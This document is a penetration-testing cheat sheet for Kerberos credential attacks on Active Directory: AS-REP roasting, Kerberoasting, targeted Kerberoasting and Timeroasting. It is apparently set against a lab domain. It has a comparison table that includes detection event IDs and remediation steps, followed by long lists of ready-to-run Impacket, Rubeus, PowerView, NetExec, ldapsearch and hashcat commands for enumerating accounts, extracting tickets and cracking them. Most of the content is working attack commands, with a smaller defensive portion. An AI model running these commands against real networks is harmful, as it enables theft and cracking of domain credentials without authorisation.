| Technique | What we need | What we request | Linux abuse | Windows abuse | Crack | Detection | Cleanup and remediation |
|---|---|---|---|---|---|---|---|
| AS-REP Roasting | Valid username list or domain credentials. Target account has DONT_REQ_PREAUTH set. | AS-REP for the target user without Kerberos pre-authentication. | GetNPUsers.py ootw.local/ -dc-ip 10.10.10.200 -usersfile users.txt -format hashcat -outputfile asrep.hashes | Rubeus.exe asreproast /format:hashcat /outfile:asrep.hashes | hashcat -m 18200 asrep.hashes /usr/share/wordlists/rockyou.txt | Event ID 4768 where pre-authentication is not used. Watch bursts of AS-REQs against many users. | Disable "Do not require Kerberos preauthentication". Rotate cracked passwords. Prefer long random passwords and managed service accounts. |
| Kerberoasting | Any domain user. Target account has one or more SPNs. Human-managed service accounts are the usual target. | TGS for the service SPN. The ticket is encrypted with the service account secret. | GetUserSPNs.py ootw.local/student:'student' -dc-ip 10.10.10.200 -request -outputfile kerberoast.hashes | Rubeus.exe kerberoast /nowrap /outfile:kerberoast.hashes | hashcat -m 13100 kerberoast.hashes /usr/share/wordlists/rockyou.txt for RC4, hashcat -m 19600 for AES128, hashcat -m 19700 for AES256. | Event ID 4769. Watch high volume TGS requests, RC4 ticket requests, and requests for uncommon services. | Use gMSA where possible. Use long random service account passwords. Disable RC4 where operationally possible. Rotate cracked service account passwords. |
| Targeted Kerberoasting | ACL control over a user object, usually GenericAll, GenericWrite, WriteProperty, WriteSPN, or equivalent write access to servicePrincipalName. | Temporarily add an SPN to the controlled user, request a TGS, then remove the SPN. | python3 targetedKerberoast.py -vv -d ootw.local -u student -p 'student' --request-user target.user --dc-ip 10.10.10.200 | Set-DomainObject -Identity target.user -Set @{serviceprincipalname='nonexistent/target'} -Verbose then Get-DomainSPNTicket -SPN 'nonexistent/target' -OutputFormat Hashcat | Same as Kerberoasting: hashcat -m 13100, 19600, or 19700 depending on the ticket type. | Event ID 4738 or directory change events for servicePrincipalName, followed by 4769 for the new SPN. | Remove the malicious SPN. Review delegated ACLs. Remove unnecessary write privileges. Rotate the target password if the hash was exposed. |
| Timeroasting | Access to the DC time service over UDP/123. Target is a machine account ending in $. | MS-SNTP response protected by the machine account secret. | sudo nxc smb 10.10.10.200 -M timeroast or use Timeroast. | Usually performed from Linux tooling. Windows hosts can still validate cracked machine credentials after cracking. | hashcat -m 31300 timeroast.hashes /usr/share/wordlists/rockyou.txt | UDP/123 requests to domain controllers from unusual hosts. Look for large sweeps against machine accounts. | Restrict who can reach DC NTP where possible. Rotate exposed machine account passwords. Investigate weak or stale computer account passwords. |
AS-REP enumeration
kerbrute userenum -d ootw.local --dc 10.10.10.200 users.txt
GetNPUsers.py ootw.local/ -dc-ip 10.10.10.200 -usersfile users.txt -format hashcat -outputfile asrep.hashes
nxc ldap 10.10.10.200 -u student -p 'student' --asreproast asrep.hashes
AS-REP cracking
hashcat -m 18200 asrep.hashes /usr/share/wordlists/rockyou.txt -r rules/best64.rule -O -w 3
hashcat -m 18200 asrep.hashes /usr/share/wordlists/rockyou.txt --show
Kerberoast enumeration
GetUserSPNs.py ootw.local/student:'student' -dc-ip 10.10.10.200
ldapsearch -x -H ldap://10.10.10.200 -D "ootw\\student" -w 'student' -b "DC=ootw,DC=local" "(servicePrincipalName=*)" servicePrincipalName sAMAccountName
nxc ldap 10.10.10.200 -u student -p 'student' --kerberoast kerberoast.hashes
Kerberoast targeted request
GetUserSPNs.py ootw.local/student:'student' -dc-ip 10.10.10.200 -request-user svc_sql
GetUserSPNs.py ootw.local/student:'student' -dc-ip 10.10.10.200 -request -outputfile kerberoast.hashes
Kerberoast with alternate authentication
GetUserSPNs.py ootw.local/student -dc-ip 10.10.10.200 -hashes :<NTLM_HASH> -request
KRB5CCNAME=/tmp/student.ccache GetUserSPNs.py ootw.local/student -k -dc-ip 10.10.10.200 -request
GetUserSPNs.py ootw.local/student -aesKey <HEX_AESKEY> -dc-ip 10.10.10.200 -request
Kerberoast cracking
hashcat -m 13100 kerberoast.hashes /usr/share/wordlists/rockyou.txt -r rules/best64.rule -O -w 3
hashcat -m 19600 kerberoast.hashes /usr/share/wordlists/rockyou.txt
hashcat -m 19700 kerberoast.hashes /usr/share/wordlists/rockyou.txt
hashcat -m 13100 kerberoast.hashes /usr/share/wordlists/rockyou.txt --show
Windows SPN enumeration
Get-DomainUser -SPN | Select-Object samaccountname,serviceprincipalname
Get-NetUser -SPN | ?{ $_.SPN -match 'mssql|cifs|http|ldap' }
setspn.exe -Q */*
Windows Kerberoasting
Rubeus.exe kerberoast /nowrap /outfile:kerberoast.hashes
Rubeus.exe kerberoast /spn:MSSQLSvc/sql01.ootw.local:1433 /simple /nowrap
Targeted Kerberoast from Linux
python3 targetedKerberoast.py -vv -d ootw.local -u student -p 'student' --request-user target.user --dc-ip 10.10.10.200
hashcat -m 13100 target.hash /usr/share/wordlists/rockyou.txt
Targeted Kerberoast from Windows
Set-DomainObject -Identity target.user -Set @{serviceprincipalname='nonexistent/target'} -Verbose
Get-DomainSPNTicket -SPN 'nonexistent/target' -OutputFormat Hashcat
Set-DomainObject -Identity target.user -Clear serviceprincipalname -Verbose
Timeroasting
sudo nxc smb 10.10.10.200 -M timeroast
hashcat -m 31300 timeroast.hashes /usr/share/wordlists/rockyou.txt
hashcat -m 31300 timeroast.hashes /usr/share/wordlists/rockyou.txt --show
LDAP filters
AS-REP roastable users:
(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))
Kerberoastable users:
(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))
Enabled service accounts with SPNs:
(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))
LDAP command examples
ldapsearch -x -H ldap://10.10.10.200 -D "ootw\\student" -w 'student' -b "DC=ootw,DC=local" "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" sAMAccountName userAccountControl
ldapsearch -x -H ldap://10.10.10.200 -D "ootw\\student" -w 'student' -b "DC=ootw,DC=local" "(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt))" sAMAccountName servicePrincipalName
Response checks
Get-ADUser -LDAPFilter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" -Properties userAccountControl
Get-ADUser -LDAPFilter "(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))" -Properties servicePrincipalName,msDS-SupportedEncryptionTypes
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4768} | Select-Object -First 20
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4769} | Select-Object -First 20